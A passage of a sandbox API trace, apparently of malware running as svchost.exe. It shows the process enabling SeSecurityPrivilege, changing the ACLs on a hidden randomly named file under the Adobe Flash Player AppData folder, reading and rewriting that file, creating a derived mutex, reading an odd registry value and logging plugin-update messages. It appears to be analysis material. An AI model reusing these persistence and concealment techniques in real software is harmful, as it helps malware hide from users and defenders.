Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.593] GetLastError () returned 0x0 [0120.594] CloseHandle (hObject=0x1b0) returned 1 [0120.594] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.594] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214310, lpbSaclPresent=0x735f07c, pSacl=0x735f070, lpbSaclDefaulted=0x735f078 | out: lpbSaclPresent=0x735f07c, pSacl=0x735f070, lpbSaclDefaulted=0x735f078) returned 1 [0120.594] SetNamedSecurityInfoW () returned 0x0 [0120.604] LocalFree (hMem=0x5214310) returned 0x0 [0120.604] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0120.605] GetCurrentThread () returned 0xfffffffe [0120.605] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f044 | out: TokenHandle=0x735f044*=0x0) returned 0 [0120.605] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f044 | out: TokenHandle=0x735f044*=0x1b0) returned 1 [0120.605] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f04c | out: lpLuid=0x735f04c*(LowPart=0x8, HighPart=0)) returned 1 [0120.606] AdjustTokenPrivileges (in: TokenHandle=0x1b0, DisableAllPrivileges=0, NewState=0x735f048*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.606] GetLastError () returned 0x0 [0120.607] CloseHandle (hObject=0x1b0) returned 1 [0120.607] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.607] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x735f07c, pSacl=0x735f070, lpbSaclDefaulted=0x735f078 | out: lpbSaclPresent=0x735f07c, pSacl=0x735f070, lpbSaclDefaulted=0x735f078) returned 1 [0120.607] SetNamedSecurityInfoW () returned 0x0 [0120.609] LocalFree (hMem=0x52142e0) returned 0x0 [0120.609] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0120.610] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x735f090 | out: lpFileSize=0x735f090*=3485) returned 1 [0120.610] VirtualAlloc (lpAddress=0x0, dwSize=0xd9d, flAllocationType=0x3000, flProtect=0x4) returned 0x4ee0000 [0120.610] ReadFile (in: hFile=0x1b0, lpBuffer=0x4ee0000, nNumberOfBytesToRead=0xd9d, lpNumberOfBytesRead=0x735f09c, lpOverlapped=0x0 | out: lpBuffer=0x4ee0000*, lpNumberOfBytesRead=0x735f09c*=0xd9d, lpOverlapped=0x0) returned 1 [0120.618] CloseHandle (hObject=0x1b0) returned 1 [0120.618] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366141") returned 10 [0120.619] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366141") returned 10 [0120.620] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366142") returned 10 [0120.621] wvnsprintfA (in: pszDest=0x5413c28, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366142") returned 10 [0120.622] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366147") returned 10 [0120.640] wvnsprintfA (in: pszDest=0x5413c28, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366147") returned 10 [0120.641] wvnsprintfA (in: pszDest=0x5413c28, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366202") returned 10 [0120.643] wvnsprintfA (in: pszDest=0x5413c28, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366202") returned 10 [0120.644] wvnsprintfA (in: pszDest=0x5413c28, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366202") returned 10 [0120.645] wvnsprintfA (in: pszDest=0x5413a68, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366202") returned 10 [0120.647] wvnsprintfA (in: pszDest=0x5413b68, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366202") returned 10 [0120.648] wvnsprintfA (in: pszDest=0x5413c28, cchDest=21, pszFmt="%d", arglist=0x735efe0 | out: pszDest="1476366202") returned 10 [0120.650] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0120.652] WriteFile (in: hFile=0x1b0, lpBuffer=0x54053f0*, nNumberOfBytesToWrite=0xe9f, lpNumberOfBytesWritten=0x735f094, lpOverlapped=0x0 | out: lpBuffer=0x54053f0*, lpNumberOfBytesWritten=0x735f094, lpOverlapped=0x0) returned 1 [0120.653] CloseHandle (hObject=0x1b0) returned 1 [0120.664] ReleaseMutex (hMutex=0x1b8) returned 1 [0120.671] CloseHandle (hObject=0x1b8) returned 1 [0120.675] SetLastError (dwErrCode=0x0) [0120.675] GetLastError () returned 0x0 [0120.675] GetLocalTime (in: lpSystemTime=0x735f478 | out: lpSystemTime=0x735f478*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x5e)) [0120.675] GetCurrentThreadId () returned 0xd70 [0120.675] GetCurrentProcessId () returned 0x2ec [0120.675] wvnsprintfW (in: pszDest=0x5402128, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f41c | out: pszDest="[13.10.2016 15:43:23] ver=2.2.5, log=0x000C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0120.675] wvnsprintfW (in: pszDest=0x54021d4, cchDest=1962, pszFmt="No update url.", arglist=0x735f498 | out: pszDest="No update url.") returned 14 [0120.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: No update url.", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0120.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: No update url.", cchWideChar=100, lpMultiByteStr=0x5403138, cbMultiByte=101, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: No update url.", lpUsedDefaultChar=0x0) returned 100 [0120.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: No update url.", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0120.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: No update url.", cchWideChar=100, lpMultiByteStr=0x54031b0, cbMultiByte=101, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000C, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: No update url.", lpUsedDefaultChar=0x0) returned 100 [0120.676] GetSystemTime (in: lpSystemTime=0x735f068 | out: lpSystemTime=0x735f068*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x5e)) [0120.676] SystemTimeToFileTime (in: lpSystemTime=0x735f068, lpFileTime=0x735f058 | out: lpFileTime=0x735f058) returned 1 [0120.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412078, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.677] GetUserNameExW () returned 0x1 [0120.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x54130a8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.678] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="8A") returned 2 [0120.679] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="00") returned 2 [0120.679] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="00") returned 2 [0120.679] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="00") returned 2 [0120.727] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="B7") returned 2 [0120.727] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="49") returned 2 [0120.727] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="67") returned 2 [0120.727] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="98") returned 2 [0120.727] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="F6") returned 2 [0120.728] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="14") returned 2 [0120.728] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="59") returned 2 [0120.728] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="35") returned 2 [0120.728] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="AA") returned 2 [0120.728] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="3E") returned 2 [0120.728] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="27") returned 2 [0120.729] wvnsprintfW (in: pszDest=0x735ee50, cchDest=6, pszFmt="%02X", arglist=0x735ee2c | out: pszDest="60") returned 2 [0120.729] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1b8 [0120.729] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0120.796] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.796] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0120.797] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.797] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.797] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.797] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.798] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.798] GetCurrentThread () returned 0xfffffffe [0120.798] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f0b4 | out: TokenHandle=0x735f0b4*=0x0) returned 0 [0120.798] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f0b4 | out: TokenHandle=0x735f0b4*=0x1cc) returned 1 [0120.798] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f0bc | out: lpLuid=0x735f0bc*(LowPart=0x8, HighPart=0)) returned 1 [0120.799] AdjustTokenPrivileges (in: TokenHandle=0x1cc, DisableAllPrivileges=0, NewState=0x735f0b8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.799] GetLastError () returned 0x0 [0120.799] CloseHandle (hObject=0x1cc) returned 1 [0120.799] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.799] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52140d0, lpbSaclPresent=0x735f0ec, pSacl=0x735f0e0, lpbSaclDefaulted=0x735f0e8 | out: lpbSaclPresent=0x735f0ec, pSacl=0x735f0e0, lpbSaclDefaulted=0x735f0e8) returned 1 [0120.799] SetNamedSecurityInfoW () returned 0x0 [0120.810] LocalFree (hMem=0x52140d0) returned 0x0 [0120.810] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0120.811] GetCurrentThread () returned 0xfffffffe [0120.811] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f0b4 | out: TokenHandle=0x735f0b4*=0x0) returned 0 [0120.811] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f0b4 | out: TokenHandle=0x735f0b4*=0x1cc) returned 1 [0120.811] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f0bc | out: lpLuid=0x735f0bc*(LowPart=0x8, HighPart=0)) returned 1 [0120.812] AdjustTokenPrivileges (in: TokenHandle=0x1cc, DisableAllPrivileges=0, NewState=0x735f0b8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.812] GetLastError () returned 0x0 [0120.812] CloseHandle (hObject=0x1cc) returned 1 [0120.812] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.812] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214100, lpbSaclPresent=0x735f0ec, pSacl=0x735f0e0, lpbSaclDefaulted=0x735f0e8 | out: lpbSaclPresent=0x735f0ec, pSacl=0x735f0e0, lpbSaclDefaulted=0x735f0e8) returned 1 [0120.812] SetNamedSecurityInfoW () returned 0x0 [0120.819] LocalFree (hMem=0x5214100) returned 0x0 [0120.819] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0120.820] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x735f100 | out: lpFileSize=0x735f100*=558) returned 1 [0120.820] VirtualAlloc (lpAddress=0x0, dwSize=0x22e, flAllocationType=0x3000, flProtect=0x4) returned 0x4ee0000 [0120.820] ReadFile (in: hFile=0x1cc, lpBuffer=0x4ee0000, nNumberOfBytesToRead=0x22e, lpNumberOfBytesRead=0x735f10c, lpOverlapped=0x0 | out: lpBuffer=0x4ee0000*, lpNumberOfBytesRead=0x735f10c*=0x22e, lpOverlapped=0x0) returned 1 [0120.821] CloseHandle (hObject=0x1cc) returned 1 [0120.822] wvnsprintfA (in: pszDest=0x54132c8, cchDest=21, pszFmt="%d", arglist=0x735f050 | out: pszDest="1476366202") returned 10 [0120.823] wvnsprintfA (in: pszDest=0x5413408, cchDest=21, pszFmt="%d", arglist=0x735f050 | out: pszDest="1476366203") returned 10 [0120.824] wvnsprintfA (in: pszDest=0x54132a8, cchDest=21, pszFmt="%d", arglist=0x735f050 | out: pszDest="1476366203") returned 10 [0120.825] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0120.840] WriteFile (in: hFile=0x1cc, lpBuffer=0x5401588*, nNumberOfBytesToWrite=0x30e, lpNumberOfBytesWritten=0x735f104, lpOverlapped=0x0 | out: lpBuffer=0x5401588*, lpNumberOfBytesWritten=0x735f104, lpOverlapped=0x0) returned 1 [0120.903] CloseHandle (hObject=0x1cc) returned 1 [0120.929] ReleaseMutex (hMutex=0x1b8) returned 1 [0120.956] CloseHandle (hObject=0x1b8) returned 1 [0120.956] SetLastError (dwErrCode=0x0) [0120.956] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f11c | out: phkResult=0x735f11c*=0x1b8) returned 0x0 [0120.958] RegQueryValueExW (in: hKey=0x1b8, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f144, lpData=0x0, lpcbData=0x735f12c*=0x0 | out: lpType=0x735f144*=0x3, lpData=0x0, lpcbData=0x735f12c*=0x220) returned 0x0 [0120.958] RegQueryValueExW (in: hKey=0x1b8, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f144, lpData=0x54013e0, lpcbData=0x735f12c*=0x220 | out: lpType=0x735f144*=0x3, lpData=0x54013e0*, lpcbData=0x735f12c*=0x220) returned 0x0 [0120.958] RegCloseKey (hKey=0x1b8) returned 0x0 [0120.967] GetLastError () returned 0x0 [0120.967] GetLocalTime (in: lpSystemTime=0x735f628 | out: lpSystemTime=0x735f628*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x187)) [0120.967] GetCurrentThreadId () returned 0xd70 [0120.967] GetCurrentProcessId () returned 0x2ec [0120.967] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f5cc | out: pszDest="[13.10.2016 15:43:23] ver=2.2.5, log=0x000F, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0120.968] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="DynamicUpdate::updateplugin, get etag (%d) = %S", arglist=0x735f648 | out: pszDest="DynamicUpdate::updateplugin, get etag (8) = ") returned 44 [0120.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000F, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (8) = ", cchWideChar=130, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 130 [0120.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000F, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (8) = ", cchWideChar=130, lpMultiByteStr=0x5403100, cbMultiByte=131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000F, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (8) = ", lpUsedDefaultChar=0x0) returned 130 [0120.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000F, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (8) = ", cchWideChar=130, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 130 [0120.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000F, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (8) = ", cchWideChar=130, lpMultiByteStr=0x5401500, cbMultiByte=131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x000F, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (8) = ", lpUsedDefaultChar=0x0) returned 130 [0120.974] GetSystemTime (in: lpSystemTime=0x735f218 | out: lpSystemTime=0x735f218*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x18e)) [0120.974] SystemTimeToFileTime (in: lpSystemTime=0x735f218, lpFileTime=0x735f208 | out: lpFileTime=0x735f208) returned 1 [0120.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x54122a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.981] GetUserNameExW () returned 0x1 [0120.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413448, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.982] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="8A") returned 2 [0120.982] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0120.982] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0120.982] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0120.982] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="B7") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="49") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="67") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="98") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="F6") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="14") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="59") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="35") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="AA") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="3E") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="27") returned 2 [0120.983] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="60") returned 2 [0120.983] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1b8 [0120.984] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0120.996] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.996] GetFileAttributesW (lpFileName="C:\\Users") returned 